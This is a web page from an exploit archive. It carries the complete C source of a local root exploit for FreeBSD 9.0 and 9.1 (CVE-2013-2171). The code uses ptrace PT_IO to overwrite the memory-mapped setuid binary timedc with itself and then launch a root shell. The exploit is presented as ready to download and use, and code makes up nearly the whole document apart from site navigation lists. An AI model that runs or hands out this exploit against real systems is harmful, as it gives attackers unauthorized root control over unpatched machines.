FreeBSD 9.0 / 9.1 mmap/ptrace Exploit

FreeBSD 9.0 / 9.1 mmap/ptrace Exploit: Posted Jun 19, 2013; Authored by Hunger; FreeBSD versions 9.0 and 9.1 mmap/ptrace privilege escalation exploit that leverages the issue described in FreeBSD-SA-13:06.; tags | exploit; systems | freebsd; advisories | CVE-2013-2171; SHA-256 | 33ab3cd2db81ca119a894609c3cbec29fc118789f6df44a99945d5cda231b71c; Download | Favorite | View

FreeBSD 9.0 / 9.1 mmap/ptrace Exploit

/*
 * FreeBSD 9.{0,1} mmap/ptrace exploit
 * by Hunger <fbsd9lul@hunger.hu>
 *
 * Happy Birthday FreeBSD!
 * Now you are 20 years old and your security is the same as 20 years ago... :)
 *
 * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
 *              sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
 *                      I hope we'll meet again at 8@1470n ;)
 *
 * Special thanks to proactivesec.com
 *
 */

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
   int from_fd, to_fd, status;
   struct stat st;
   struct ptrace_io_desc piod;
   char *s, *d;
   pid_t pid;

   if (geteuid() == 0)  {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
   }

   printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
   printf("by Hunger <fbsd9lul@hunger.hu>\n");

   if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");

   if (stat(av[0], &st) == -1)
        err(2, "stat");

   if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

   if ((pid = fork()) == -1)
        err(4, "fork");

   if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                err(5, "ptraceme");

        return 0;
        }

   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

   if (wait(&status) == -1)
        err(7, "wait");

   piod.piod_op = PIOD_WRITE_D;
   piod.piod_offs = d;
   piod.piod_addr = s;
   piod.piod_len  = st.st_size;

   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

   execl(TG, TG, NULL);

   return 0;
}

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

FreeBSD 9.0 / 9.1 mmap/ptrace Exploit

FreeBSD 9.0 / 9.1 mmap/ptrace Exploit

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FreeBSD 9.0 / 9.1 mmap/ptrace Exploit

Share This

FreeBSD 9.0 / 9.1 mmap/ptrace Exploit

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems